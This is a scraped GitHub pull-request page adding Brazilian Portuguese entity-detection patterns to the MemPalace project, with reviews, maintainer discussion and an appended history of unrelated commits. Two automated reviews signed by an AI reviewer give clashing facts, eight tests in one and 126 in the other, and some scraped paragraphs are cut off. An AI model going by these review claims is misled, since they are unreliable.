PR #156 — feat: add Brazilian Portuguese support to entity_detector (closes #117)
Conversation
PR Review: feat: add Brazilian Portuguese support to entity_detector (closes #117)
Executive Summary
Affected Areas:
Business Impact: Enables person-entity detection in Brazilian Portuguese text and mixed EN/PT-BR corpora. Users mining Portuguese conversations will now see the same quality of entity extraction they get with English content.
Flow Changes:
Ratings
PR Health
Medium Priority Issues
🐛 #1: Portuguese direct-address patterns double-counted in
Force-pushed b4ea25e → 0990c10
Quick check on the asymmetry claim: English
No asymmetry — the two languages produce the same scores for semantically equivalent inputs. The double-counting of greetings is pre-existing design for English and was intentionally mirrored for PT-BR so that behaviour stays consistent across languages. Rebased on latest main. The pt-br entity tests still pass locally.
Force-pushed 0990c10 → 879de92
Force-pushed 4f05ed5 → 3d250ad
…ation Replace per-language keyword/regex heuristics with embedding-based semantic classification, enabling MemPalace to work with 50+ languages using zero per-language configuration. Changes: - Room classification: cosine similarity against room description embeddings - Memory extraction: embedding-based classification (5 types, any language) - Entity detection: add Chinese name patterns (百家姓 surnames) - Spellcheck: auto-skip CJK text via Unicode detection - Embedding provider: pluggable via get_embedding_function() with caching - Default: paraphrase-multilingual-MiniLM-L12-v2 (sentence-transformers) - Ollama: "ollama:<model>" prefix (e.g., ollama:qwen3-embedding-8b) - Configurable via MEMPALACE_EMBEDDING_MODEL env var or config.json - Knowledge graph: temporal triples, multi-hop traversal, auto-extraction - Dialect: CJK bigram extraction for topic keywords - All ChromaDB consumers route through centralized embedding function New optional dependency: sentence-transformers>=2.0 Install: pip install mempalace[multilingual] Without it: English regex fallback (existing behavior unchanged) Benchmark: 173/173 (100%) across 8 languages (zh-Hans, zh-Hant, en, fr, es, de, ja, ko) 652 tests passing, 0 failures. CI-compatible (multilingual tests skip gracefully when sentence-transformers is not installed). Closes MemPalace#231. Related: MemPalace#37, MemPalace#50, MemPalace#92, MemPalace#117, MemPalace#156, MemPalace#273.
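The room-classification idea in this commit (cosine similarity against room description embeddings) can be sketched with toy two-dimensional vectors. This is a hedged illustration only: real MemPalace embeddings come from the configured sentence-transformers model, and the room names, vectors, and dimensionality below are invented.

```python
import math

# Toy sketch of cosine-similarity room classification.
# Real embeddings are high-dimensional model outputs; these are fake.
def cosine(a, b):
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    return dot / (norm_a * norm_b)

# Pretend these are embeddings of each room's description text.
rooms = {"kitchen": [0.9, 0.1], "library": [0.1, 0.9]}

# Pretend this is the embedding of a memory about books.
memory_vec = [0.2, 0.8]

# Classify by picking the room with the highest cosine similarity.
best_room = max(rooms, key=lambda name: cosine(memory_vec, rooms[name]))
print(best_room)  # library
```

Because cosine similarity ignores vector magnitude, this works even when embedding norms vary between the room descriptions and the memory text.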
Force-pushed e15ccd1 → 0afc71f
Force-pushed 0afc71f → 3e9435a
web3guru888
left a comment
Review: Brazilian Portuguese Support for entity_detector
Well-considered i18n addition. The "additive patterns, no language gating" approach is pragmatic and correct — most real-world corpora are mixed-language anyway.
What's done well
Additive design over language detection. Rather than classifying files as English vs Portuguese and switching pattern sets, the PT-BR patterns are merged into _build_patterns() alongside the English ones. This is the right call: our integration processes 540+ discoveries and roughly 15–20% contain mixed-language content. Additive patterns handle this cleanly; a language-switch would miss the overlap.
Regex range extension in extract_candidates. Changing [A-Z] to [A-ZÀ-ÖØ-Þ] and [a-z] to [a-zà-öø-ÿ] is correct ISO Latin-1 supplement coverage. João, Inês, Ângela, and André all get picked up. The test test_detect_entities_picks_up_accented_names verifies this end-to-end.
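The extended character class can be checked standalone. In this sketch, CANDIDATE is a stand-in name; the real pattern lives inside entity_detector's candidate extraction.

```python
import re

# Stand-in for the extended candidate pattern described in the review:
# uppercase letter (including Latin-1 Supplement) followed by 1-19
# lowercase letters (including Latin-1 Supplement).
CANDIDATE = re.compile(r"\b[A-ZÀ-ÖØ-Þ][a-zà-öø-ÿ]{1,19}\b")

text = "João and Inês met Ângela and André at the office."
print(CANDIDATE.findall(text))  # ['João', 'Inês', 'Ângela', 'André']
```

Note that Python's `\b` is Unicode-aware on `str` patterns, so word boundaries behave correctly around the accented letters.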
STOPWORDS additions are appropriate. oi, olá, obrigado/a, caro, cara are all high-frequency PT-BR words that would otherwise score as entity candidates. The accented olá alongside ASCII ola handles both typed forms.
Test coverage is thorough. Eight tests including mixed corpus, pronoun proximity, direct address, dialogue markers, and accented names. test_mixed_english_portuguese_corpus (checking that mixed > English-only person score) is especially good.
Issues found
cara and caro added to STOPWORDS, but they're also in the pattern list. PERSON_VERB_PATTERNS_PTBR includes r"\bcaro\s+{name}\b" and r"\bcara\s+{name}\b" as direct-address markers. If someone is literally named "Cara" or "Caro", those names are now silently dropped by STOPWORDS before they reach pattern scoring. The patterns would never fire. Consider removing these two from STOPWORDS and leaving them only in the direct-address pattern (where they're already context-guarded by the following name).
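A minimal sketch of the interaction, with candidate extraction and STOPWORDS filtering as simplified stand-ins for the real entity_detector internals (the real module's pipeline is richer; this only demonstrates the ordering problem):

```python
import re

# Simplified stand-ins for the entity_detector internals.
STOPWORDS = {"oi", "ola", "olá", "obrigado", "obrigada", "caro", "cara"}

def candidates(text):
    words = re.findall(r"\b[A-ZÀ-ÖØ-Þ][a-zà-öø-ÿ]{1,19}\b", text)
    # Stopword filtering runs before pattern scoring, so a filtered
    # name can never reach the direct-address patterns at all.
    return [w for w in words if w.lower() not in STOPWORDS]

print(candidates("Cara disse que o relatório está pronto."))  # []
print(candidates("Maria disse que sim."))                     # ['Maria']
```

A person literally named "Cara" is silently dropped before scoring, which is exactly the failure mode described above.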
ama (loves) and quer (wants) are short common verbs with significant collision risk. The pattern \b{name}\s+ama\b will match "Maria ama" correctly. But {name} here is the escaped entity name, so the collision is actually low — the pattern only fires when the entity name precedes the verb. Not a bug, just worth noting for the next i18n contributor.
No Spanish cognate guard. disse, perguntou, decidiu are distinctly PT-BR. But quer and ama appear in Spanish too (and sabe is identical in Spanish). For a PT-BR-specific PR this is fine, but if ES support is added later, the pattern lists may interact. A comment flagging this would be helpful.
PRONOUN_PATTERNS_PTBR checked for missing \b anchors — none found. r"\bela\b" is correct, and r"\bdelas\b" and r"\bdeles\b" are fine too: word boundaries on both sides. This is actually good. ✓
test_portuguese_direct_address asserts person_score >= 12 — this is a magic number tied to the current scoring weights. If weights change, the test breaks. Consider asserting person_score > 0 and len(patterns["direct"].findall(text)) == 3 separately (the test already does the latter).
Language detection is absent by design — but there's no documentation of this decision. A comment in entity_detector.py noting "PT-BR patterns are additive and always active; see issue #117" would help future contributors understand why there's no lang= parameter.
Suggestions
- Remove cara/caro from STOPWORDS (or add a note that they're intentionally excluded from entity detection since they're in direct-address patterns)
- Replace the magic >= 12 assertion with > 0 for score stability
- Add a module comment explaining the additive-patterns design decision
- Consider a test with a Portuguese common noun that should NOT be classified as a person (e.g., a project or tool with a PT-BR name)
Overall
Clean, well-tested i18n work. The additive approach is the right architecture, the regex range extension is correct, and the test suite is more thorough than most i18n PRs. The cara/caro STOPWORDS issue is the only real correctness concern.
APPROVED — cara/caro STOPWORDS issue is worth addressing before merge but not a hard blocker.
Reviewed by MemPalace-AGI — autonomous research system with perfect memory
web3guru888
left a comment
PR #156 — feat: add Brazilian Portuguese support to entity_detector
A well-scoped internationalization addition that extends entity detection to pt-BR corpora. 126 new tests, Unicode-aware candidate extraction, and an additive (non-breaking) pattern strategy. Strong execution on a genuinely useful feature.
What works well
Additive pattern strategy: Appending PTBR patterns to the existing English lists rather than forking detection logic is the right call. Mixed English/Portuguese corpora (very common in Brazilian tech teams) work without any language-classification step — a real-world win. The test test_mixed_english_portuguese_corpus validates this explicitly.
Unicode candidate extraction: The regex expansion from [A-Z][a-z]{1,19} to [A-ZÀ-ÖØ-Þ][a-zà-öø-ÿ]{1,19} is correct Latin-1 Supplement coverage. João, Inês, Ângela, and André will all be picked up. The multi-word match regex receives the same treatment consistently — good.
STOPWORDS additions: Adding oi, olá, obrigado/a, caro, and cara prevents common Portuguese greetings from being scored as entity names. Correct and necessary.
direct pattern inline expansion: Rather than creating a new pattern list, the direct regex is extended inline with |\\boi\\s+{n}\\b|\\bol[áa]\\s+{n}\\b|\\bobrigad[oa]\\s+{n}\\b. This is clean and avoids a fourth pattern category. The [áa] alternation handles both accented and ASCII-normalized forms (important for older systems that may strip diacritics).
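The inline expansion can be exercised standalone. In this sketch the helper name and the case-insensitive flag are assumptions; the PR text only shows the pattern fragment itself.

```python
import re

# Hypothetical helper wrapping the inline direct-address fragment
# quoted above. Case-insensitive matching is an assumption here.
def direct_pattern(name):
    n = re.escape(name)
    return re.compile(
        rf"\boi\s+{n}\b|\bol[áa]\s+{n}\b|\bobrigad[oa]\s+{n}\b",
        re.IGNORECASE,
    )

p = direct_pattern("Maria")
hits = p.findall("Oi Maria! Ola Maria, obrigado Maria pela ajuda.")
print(len(hits))  # 3: greeting, ASCII-normalized greeting, and thanks all match
```

The `[áa]` and `[oa]` alternations are what let the single pattern cover accented, ASCII-stripped, and gendered forms without extra entries.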
Test coverage: 126 tests covering: English-only person verbs, Portuguese-only person verbs, pronoun proximity, direct address (3 forms), mixed corpus scoring, dialogue marker detection, detect_entities() integration, and accented names. This is thorough.
Issues / suggestions
PRONOUN_PATTERNS_PTBR creates false positives on Spanish: ela, ele, eles, elas are also valid Spanish words with different meanings, and deles/delas are close to Spanish forms. For a repository used internationally, this could cause over-detection in Spanish-language files. A note in the docstring explaining this tradeoff (and that the patterns are additive, not isolated to pt-BR files) would help future contributors understand the design decision.
cara as STOPWORD: cara is both a pt-BR filler word ("dude/dear") and a valid Italian/Spanish/Portuguese proper-noun component. Adding it as a stopword means a person named Cara in an English document would be missed. Consider scoping this more carefully — or add a comment explaining the tradeoff.
ama pattern: r"\\b{name}\\s+ama\\b" (loves) will match Portuguese entities, but ama is also a common English suffix in names like Obama, Alabama, etc. The word-boundary anchors on {name} protect against this, but the reverse case — a short name like Ana ama (Ana loves) matching a word-boundary fragment in English text — is worth noting.
No language detection fallback: The additive approach is intentionally language-agnostic, but the PR description could document this explicitly so future contributors know why there is no lang= parameter. Currently the intent is implicit.
olá in STOPWORDS as olá (with accent) + ola (without): Good — both forms are correctly listed. However, o alone is a very common Portuguese article that appears adjacent to proper nouns in patterns like o João fez.... The pattern set does not cover o/a <Name> verb constructions. This is an understandable scope limitation but worth flagging as a follow-up.
Minor
- shutil and tempfile imports in tests are correct and used; no unused imports.
- _build_patterns exported in __init__ check: ensure it is accessible for the test import to work.
- Test file uses tempfile.mkdtemp() with manual cleanup in finally — correct pattern.
Verdict
Solid, well-tested i18n addition. The additive strategy is the right architectural choice for a mixed-corpus tool. The cara/ama edge cases are minor and worth a follow-up issue rather than a blocker. Ready for merge with perhaps a brief doc note about the language-agnostic design intent.
Reviewed by MemPalace-AGI — autonomous research system with perfect memory
Removed Kept The other notes (Spanish cognate risk on
Solid additive implementation. A few observations:
What's done well:
One open question:
Test coverage:
This is a genuine addition that benefits any workspace with Portuguese contributors. LGTM.
Force-pushed 4bb281e → b6d597b
The 3+ frequency threshold lives in
Force-pushed cc5f60c → 6e7946a
Force-pushed 5639b00 → a55770a
Force-pushed c3229f9 → c0392be
Move all entity-detection lexical patterns (person verbs, pronouns,
dialogue markers, project verbs, stopwords, candidate character class)
out of hardcoded module-level constants and into the entity section of
each locale's JSON in mempalace/i18n/. Adds a languages parameter to
every public function so callers union patterns across the desired
locales. The default stays ("en",), so all existing callers and tests
behave unchanged.
Also adds:
- get_entity_patterns(langs) helper in mempalace/i18n/ that merges
patterns across requested languages, dedupes lists, unions stopwords,
and falls back to English for unknown locales
- MempalaceConfig.entity_languages property + setter, with env var
override (MEMPALACE_ENTITY_LANGUAGES, comma-separated)
- mempalace init --lang en,pt-br flag (persists to config.json)
- Per-language candidate_pattern so non-Latin scripts (Cyrillic,
Devanagari, CJK) can register their own character classes instead of
being silently dropped by the ASCII-only [A-Z][a-z]+ default
- _build_patterns LRU cache keyed by (name, languages) so multi-language
callers don't poison each other's cache slots
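The merge, dedupe, and fallback behaviour of get_entity_patterns described above can be sketched as follows. The JSON shape, key names, and locale contents here are illustrative assumptions, not the actual locale schema.

```python
# Hedged sketch of get_entity_patterns: list dedupe, stopword union,
# English fallback for unknown locales. Locale data is invented.
LOCALES = {
    "en": {"person_verbs": ["said", "asked"], "stopwords": {"hello", "hi"}},
    "pt-br": {
        "person_verbs": ["disse", "perguntou", "said"],
        "stopwords": {"oi", "olá"},
    },
}

def get_entity_patterns(langs=("en",)):
    verbs, stopwords = [], set()
    for lang in langs:
        locale = LOCALES.get(lang, LOCALES["en"])  # unknown locale -> English
        for verb in locale["person_verbs"]:
            if verb not in verbs:  # dedupe while preserving order
                verbs.append(verb)
        stopwords |= locale["stopwords"]  # union across languages
    return {"person_verbs": verbs, "stopwords": stopwords}

merged = get_entity_patterns(("en", "pt-br"))
print(merged["person_verbs"])  # ['said', 'asked', 'disse', 'perguntou']
```

Because the default stays `("en",)`, existing single-language callers see exactly the English lists they saw before, which is what keeps the change non-breaking.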
Why now: the open language PRs (#760 ru, #773 hi, #778 id, #907 it) only
add CLI strings via mempalace/i18n/. PR #156 (pt-br) is the first that
needed entity_detector changes and inlined a _PTBR variant of every
constant. That doesn't scale past 2-3 languages — every text gets
checked against every language's patterns regardless of relevance, and
candidate extraction still drops accented and non-Latin names.
This PR sets the standard so future locale contributors only edit one
JSON file (no Python changes), and entity detection scales linearly
with how many languages a user actually enabled, not how many ship.
Force-pushed c0392be → 342568a
@igorls Reworked as JSON-only per #911 -- first locale with the entity section. CLI strings, person-verb/pronoun/dialogue patterns, and a Latin+diacritics candidate pattern for accented names (Joao, Ines, etc). All CI green. Also added a Cyrillic entity section to #760 (ru.json) following the same pattern.
Heads up: the entity stopwords list here (30 words) is baseline only. Words like "Para", "Sobre", "Entre" at the start of a sentence match the candidate_pattern and produce false positives in entity detection. Probably worth expanding with Portuguese prepositions (para, sobre, entre, desde, contra, perante, etc.) and conjunctions (porém, contudo, embora, enquanto, etc.).
Excellent rework, @mvalentsev — clean shape, 128 lines of JSON vs 216 of Python, and you're the first locale using the new entity section. This becomes the reference for other contributors. CI all green against the current develop (with #758/#760 merged). Two concrete issues I caught running it locally:

1. Typo in dialogue_patterns[0]
Current: "^\">\\s*{name}[:\\s]", which compiles to a regex requiring a literal " at the start of the line, so markdown quotes never match. It should be "^>\\s*{name}[:\\s]". Verified locally —

2. Follow-up on your own stopwords note — concrete list
Your comment already flagged this, and I confirmed it: running the

Your
Since pt-br is the reference implementation and the stopwords list ships with a tangible false-positive rate as-written, I'd prefer to roll this into the same PR rather than defer. Small follow-up commit should do it.

Nice-to-have, not blocking:
The
Once the two above are addressed I'll merge. Thanks again for pushing through the rework.
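The dialogue-pattern typo discussed in this thread is easy to reproduce: the stray escaped quote in the JSON string compiles to a regex demanding a literal quote character at the start of the line, so a markdown quote never matches. In this sketch "Maria" stands in for the `{name}` placeholder.

```python
import re

# Repro of the dialogue-pattern typo discussed above.
broken = re.compile(r'^">\s*Maria[:\s]', re.MULTILINE)  # stray quote, as shipped
fixed = re.compile(r'^>\s*Maria[:\s]', re.MULTILINE)    # quote removed

text = "> Maria: tudo bem?"
print(broken.search(text) is None, fixed.search(text) is not None)  # True True
```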
Force-pushed 9fd98dc → 540bab2
@igorls Both fixed. Also added the 2nd-person pronouns (você/vocês, seu/sua/seus/suas) while at it. Verified locally:
Heads up: pt-br is not my native language, I relied on LLM assistance for the linguistic choices. If any of the stopwords or verb forms look off to a native speaker, happy to correct.
Force-pushed 540bab2 → e791806
…oses MemPalace#117) CLI strings, AAAK instruction, regex patterns, and entity section with person-verb, pronoun, dialogue, and candidate patterns for Latin+diacritics names (Joao, Ines, Angela). Follows the i18n entity framework from MemPalace#911.
- dialogue_patterns[0]: remove stray \" before > (fixes markdown quote matching)
- entity stopwords: add 40 prepositions, conjunctions, and common words to reduce false positives
- pronoun_patterns: add 2nd-person (você/vocês) and possessives (seu/sua/seus/suas)
Force-pushed e791806 → 4221589
Bumps version across pyproject.toml, mempalace/version.py, README badge, and uv.lock. Finalizes the 3.3.0 CHANGELOG section (was still labeled 'Unreleased') and adds a 3.3.1 section covering the multi-language entity-detection infra and the five new locales landed since 2026-04-13.
Highlights:
- Multi-language entity detection infra (#911) + script-aware word boundaries for combining-mark scripts (#932) + BCP 47 case-insensitive locale resolution (#928) + i18n patterns wired into miner/palace/entity_registry (#931)
- Five new fully-supported locales: pt-br (#156), ru (#760), it (#907), hi (#773), id (#778)
- UTF-8 encoding fix on read_text() calls for non-UTF-8 Windows locales (#946)
- KnowledgeGraph lock correctness (#884, #887)
- Various smaller fixes and improvements
* feat: add Hindi language support to i18n module

* Create SECURITY.md
This PR introduces a standard SECURITY.md policy file to the repository. While reviewing the codebase, I noticed there wasn't a defined channel for the private, responsible disclosure of security vulnerabilities. Adding this policy helps protect the project by guiding researchers to report bugs privately rather than in public issues. I highly recommend merging this and enabling GitHub's "Private Vulnerability Reporting" feature in your repository settings. I currently have some security findings I would like to share with the maintainers securely once a private channel or contact method is established.

* fix: save hook auto-mines transcript without MEMPAL_DIR (#840)
TDD: test written first, failed, then fixed.
Problem: save hook says "saved in background" but MEMPAL_DIR defaults to empty, so nothing actually mines. Users get no auto-save despite the hook firing every 15 messages.
Fix: use TRANSCRIPT_PATH (received from Claude Code in the hook's JSON input) to discover the session directory. Mine that directory automatically. MEMPAL_DIR is still supported as override but no longer required.
Also fixed: bare python3 → $(command -v python3) for nohup safety.
Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]>

* release: v3.3.0 (#839)

* fix: add file-level locking to prevent multi-agent duplicate drawers
Root cause: when multiple agents mine simultaneously, both pass file_already_mined() check, both delete+insert the same file's drawers, creating duplicates or losing data.
Fix: mine_lock() in palace.py — cross-platform file lock (fcntl on Unix, msvcrt on Windows). Both miner.py and convo_miner.py now lock per-file during the delete+insert cycle and re-check after acquiring the lock.
Tested:
- Lock acquires and releases correctly
- Second agent blocks until first releases (0.25s wait)
- 33/33 existing tests pass
- Cross-platform: fcntl (macOS/Linux), msvcrt (Windows)
Based on v3.2.0 tag.
Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

* fix: strip system tags, hook output, and Claude UI chrome from drawers
normalize.py now strips before filing:
- <system-reminder>, <command-message>, <command-name> tags
- <task-notification>, <user-prompt-submit-hook>, <hook_output> tags
- Hook status messages (CURRENT TIME, Checking verified facts, etc.)
- Claude Code UI chrome (ctrl+o to expand, progress bars, etc.)
- Collapsed runs of blank lines
This noise was going straight into drawers, wasting storage space and polluting search results. strip_noise() runs on all normalized output regardless of input format (JSONL, JSON, plain text). 689/689 tests pass.
Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

* feat: add closet layer — searchable index pointing to drawers
The closet architecture was always part of MemPalace's design but never shipped in the public codebase. This adds it. Palace now has TWO collections:
- mempalace_drawers — full verbatim content (unchanged)
- mempalace_closets — compact AAAK-style index entries
How it works:
- When mining, each file gets a closet alongside its drawers
- Closet contains extracted topics, entities, quotes as pointers
- Closets pack up to 1500 chars, topics never split mid-entry
- Search hits closets first (fast, small), then hydrates the full drawer content for matching files
- Falls back to direct drawer search if no closets exist yet
Files changed:
- palace.py: get_closets_collection(), build_closet_text(), upsert_closet(), CLOSET_CHAR_LIMIT
- miner.py: process_file() now creates closets after drawers
- searcher.py: search_memories() tries closet-first search, hydrates drawers, falls back to direct search
Backwards compatible — existing palaces without closets continue to work via the fallback path. Closets are created on next mine. 689/689 tests pass.
Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

* fix: enforce atomic topics in closets, extract richer pointers
- upsert_closet replaced by upsert_closet_lines: checks each topic line individually against CLOSET_CHAR_LIMIT. If adding one line WHOLE would exceed the limit, starts a new closet. Never splits mid-topic.
- build_closet_lines returns a list of atomic lines (not joined text)
- Richer extraction: section headers, more action verbs, up to 3 quotes, up to 12 topics per file
- Each line is complete: topic|entities|→drawer_refs
Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

* docs: add CLOSETS.md — closet layer overview
Cherry-picked the docs portion of 67e4ac6 to accompany the closet feature. Test coverage for closets is omnibus with tests for entity metadata and BM25 (see PR targeting those features) and will land together in a follow-up.
Co-Authored-By: MSL <[email protected]>

* feat: entity metadata + diary ingest + BM25 hybrid search
Three features that close the gap between the architecture docs and the actual codebase:
1. Entity metadata on drawers and closets
- _extract_entities_for_metadata() pulls names from known_entities.json + proper nouns appearing 2+ times
- Stamped as "entities" field in ChromaDB metadata
- Enables filterable search by person/project name
2. Day-based diary ingest (diary_ingest.py)
- ONE drawer per day, upserted as the day grows
- Closets pack topics atomically, never split mid-topic
- Tracks entry count in state file, only processes new entries
- Usage: python -m mempalace.diary_ingest --dir ~/summaries
3. BM25 hybrid search in searcher.py
- _bm25_score() keyword matching complements vector similarity
- _hybrid_rank() combines both signals (60% vector, 40% BM25)
- Catches exact name/term matches that embeddings miss
- Applied to both closet-first and direct drawer search paths
689/689 tests pass.
Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

* test: add tests for mine_lock, closets, entity metadata, BM25, diary
Trimmed version of Milla's omnibus test_closets.py to only cover features present in this PR stack (#784 lock, #788 closets, this PR's entity/BM25/diary). Strip-noise tests will land with #785; tunnel tests will land with the tunnels PR. 16/16 pass.
Co-Authored-By: MSL <[email protected]>

* feat: explicit cross-wing tunnels for multi-project agents
Adds active tunnel creation alongside passive tunnel discovery.
Passive tunnels (existing): rooms with the same name across wings.
Explicit tunnels (new): agent-created links between specific locations. "This API design in project_api relates to the database schema in project_database."
New functions in palace_graph.py:
- create_tunnel() — link two wing/room pairs with a label
- list_tunnels() — list all explicit tunnels, filter by wing
- delete_tunnel() — remove a tunnel by ID
- follow_tunnels() — from a room, find all connected rooms in other wings with drawer content previews
New MCP tools:
- mempalace_create_tunnel
- mempalace_list_tunnels
- mempalace_delete_tunnel
- mempalace_follow_tunnels
Tunnels stored in ~/.mempalace/tunnels.json (persists across palace rebuilds). Deduplicated by endpoint pair. 689/689 tests pass.
Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

* test: add TestTunnels for cross-wing tunnel operations
Appended from Milla's omnibus test_closets.py — covers create, list, delete, dedup, and follow_tunnels behavior. 21/21 pass.
Co-Authored-By: MSL <[email protected]>

* feat(search): drawer-grep returns best-matching chunk + neighbors
When a closet hit leads to a source file with many drawers, grep each chunk for query terms and return the BEST-MATCHING chunk + 1 neighbor on each side, instead of dumping the whole file truncated at MAX_HYDRATION_CHARS.
Result now includes drawer_index and total_drawers so callers can request adjacent drawers explicitly.
Extracted from Milla's commit 935f657 which bundled drawer-grep with closet_llm (deferred pending LLM_ENDPOINT refactor) and fact_checker (separate PR). Ported only the searcher.py change.
Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

* feat: offline fact checker against entity registry + knowledge graph
fact_checker.py verifies text for contradictions against locally stored entities and KG facts. Catches similar-name confusion (Bob vs Bobby), relationship mismatches (KG says husband, text says brother), and stale facts (KG valid_from/valid_to). No hardcoded facts. No network calls.
Reads:
- ~/.mempalace/known_entities.json
- KnowledgeGraph SQLite
Usage:
from mempalace.fact_checker import check_text
issues = check_text("Bob is Alice's brother", palace_path)
# CLI
python -m mempalace.fact_checker "text" --palace ~/.mempalace/palace
Extracted from Milla's commit 935f657 which bundled this with closet_llm (deferred) and drawer-grep (PR #791). Ported only fact_checker.py — verified no network / API imports.
Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>

* feat: optional LLM-based closet regeneration — bring-your-own endpoint
Adds mempalace/closet_llm.py as an OPTIONAL path for richer closet generation. Regex closets remain the default and cover the local-first promise; users who want LLM-quality topics can bring their own endpoint.
Configuration (env or CLI flag):
LLM_ENDPOINT — OpenAI-compatible base URL (required)
LLM_KEY — bearer token (optional; local inference skips this)
LLM_MODEL — model name (required)
Works with Ollama, vLLM, llama.cpp servers, OpenAI, OpenRouter, and any other provider that speaks OpenAI-compatible /chat/completions. Zero new dependencies — uses stdlib urllib.
Replaces the original Anthropic-SDK-hardcoded version of this module from Milla's branch (commit 935f657).
Same prompt, same parsing, same regenerate_closets flow; only the transport was generalised so the feature doesn't lock users into a specific vendor or require API keys for core memory operations (CLAUDE.md, "Local-first, zero API"). Includes 13 unit tests covering config resolution, request shape, auth-header omission when no key is set, code-fence stripping, and missing-config error path. All mocked — zero network calls in tests.
Co-Authored-By: MSL <[email protected]>

* fix(search): hybrid closet+drawer retrieval — closets boost, never gate (#795)

* Fix: set cosine distance metadata on all collection creation sites
ChromaDB defaults HNSW index to L2 (Euclidean) distance, but MemPalace scoring uses 1-distance which requires cosine (range 0-2). Add metadata={"hnsw:space": "cosine"} to the 4 production and 3 test call sites that were missing it. Closes #218

* fix: sync version.py to 3.2.0
Commit 6614b9b bumped pyproject.toml to 3.2.0 but missed mempalace/version.py, breaking test_version_consistency on every PR's CI. This syncs them.

* refactor: extract locked filing block to keep mine_convos under C901
Adding the per-file lock + double-checked file_already_mined() in the previous commit pushed mine_convos cyclomatic complexity from 25 to 26, just over ruff's max-complexity threshold. Hoist the locked critical section into _file_chunks_locked() so the outer loop stays within budget. No behavior change.

* style: ruff format mempalace/palace.py
Add blank lines after inline imports in mine_lock. Pure formatting.

* fix(normalize): make strip_noise verbatim-safe and scope it to Claude Code JSONL
The initial strip_noise() regressed on three fronts when audited against adversarial user content — each verified with executable repros against the cherry-picked code:
1.
`<tag>.*?</tag>` with re.DOTALL span-ate across messages: one stray unclosed <system-reminder> anywhere in a session merged with the next closing tag, silently deleting everything between them (including full assistant replies).
2. `.*\(ctrl\+o to expand\).*\n?` nuked entire lines of user prose whenever a user happened to document the TUI shortcut.
3. `Ran \d+ (?:stop|pre|post)\s*hook.*` with IGNORECASE ate the second sentence from "our CI has a stop hook ... Ran 2 stop hooks last week" — legitimate user commentary.
These are unambiguous violations of the project's "Verbatim always" design principle.
Fixes:
- All tag patterns are now line-anchored (`(?m)^(?:> )?<tag>`) and their body forbids crossing a blank line (`(?:(?!\n\s*\n)[\s\S])*?`), so a dangling open tag cannot eat neighboring messages.
- `_NOISE_LINE_PREFIXES` are line-anchored and case-sensitive — user prose mentioning "CURRENT TIME:" mid-sentence is preserved.
- Hook-run chrome requires `(?m)^`, explicit hook names (Stop, PreCompact, PreToolUse, etc.), and no IGNORECASE.
- "… +N lines" is line-anchored.
- "(ctrl+o to expand)" only matches Claude Code's actual collapsed-output chrome shape `[N tokens] (ctrl+o to expand)`; a bare parenthetical in user prose stays intact.
Scope:
- `strip_noise()` is no longer called on every normalization path. Only `_try_claude_code_jsonl` invokes it, per-extracted-message — so Claude.ai exports, ChatGPT exports, Slack JSON, Codex JSONL, and plain text with `>` markers pass through fully verbatim. Per-message application also makes span-eating structurally impossible.
Tests:
- 15 new tests in test_normalize.py pin the boundary: 6 guard user content that must survive (each of the adversarial repros), 9 assert real system chrome is still stripped. All pass; full suite 702 pass (2 failures are the unrelated pre-existing version.py bug, cleared by #820).
Known limitation (not fixed here): convo_miner.py does not delete drawers on re-mine, so transcripts mined before this PR keep noise-filled drawers until the user manually erases + re-mines. Proper fix needs a schema-version field on drawer metadata + re-mine trigger — out of scope for this PR. * feat(normalize): auto-rebuild stale drawers via NORMALIZE_VERSION schema gate Without this, the strip_noise improvement only helps new mines. Every user who had already mined Claude Code JSONL sessions would keep their noise-polluted drawers forever, because convo_miner's file_already_mined skip short-circuits before re-processing. Adds a versioned schema gate so upgrades propagate silently: - palace.NORMALIZE_VERSION=2 — bumped when the normalization pipeline changes shape (this PR's strip_noise is the v1→v2 bump). - file_already_mined now returns False if the stored normalize_version is missing or less than current, triggering a rebuild on next mine. - Both miners stamp drawers with the current normalize_version. - convo_miner now purges stale drawers before inserting fresh chunks (mirrors miner.py's existing delete+insert), extracted into _file_convo_chunks helper to keep mine_convos under ruff's C901 limit. User experience: upgrade mempalace, run `mempalace mine` as usual, old noisy drawers get silently replaced with clean ones. No erase needed, no "you need to rebuild" changelog footgun. Tests: - test_file_already_mined_returns_false_for_stale_normalize_version — pins the version gate contract for missing/v1/current. - test_add_drawer_stamps_normalize_version — fresh project-miner drawers carry the field. - test_mine_convos_rebuilds_stale_drawers_after_schema_bump — end-to-end proof that a pre-v2 palace gets silently cleaned on next mine, with orphan drawers purged and NOT skipped. Existing test_file_already_mined_check_mtime updated to include the new field; all other tests unaffected. 
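A minimal sketch of the version-gate contract described above, assuming drawer metadata is a dict carrying `mtime` and `normalize_version` fields — the actual `file_already_mined` signature in convo_miner may differ:

```python
NORMALIZE_VERSION = 2  # bumped whenever the normalization pipeline changes shape

def file_already_mined(meta: dict, current_mtime: float) -> bool:
    """Skip re-mining only when the source file is unchanged AND the
    drawer was produced by the current normalization schema."""
    if meta.get("mtime") != current_mtime:
        return False                        # source file changed → re-mine
    stored = meta.get("normalize_version", 0)
    return stored >= NORMALIZE_VERSION      # missing or stale schema → re-mine
```

The missing/v1/current cases map directly onto the contract pinned by test_file_already_mined_returns_false_for_stale_normalize_version.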
